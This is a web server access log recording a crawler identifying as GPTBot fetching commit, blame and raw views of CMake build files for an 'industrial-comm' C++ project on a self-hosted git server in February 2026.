"/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14921] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14920] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10673] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10672] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10674] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14918] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11183] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14921] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14917] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:16:49:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:16:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11732] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11730] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11729] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11303] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11301] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11300] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11185] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11182] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:16:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11185] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 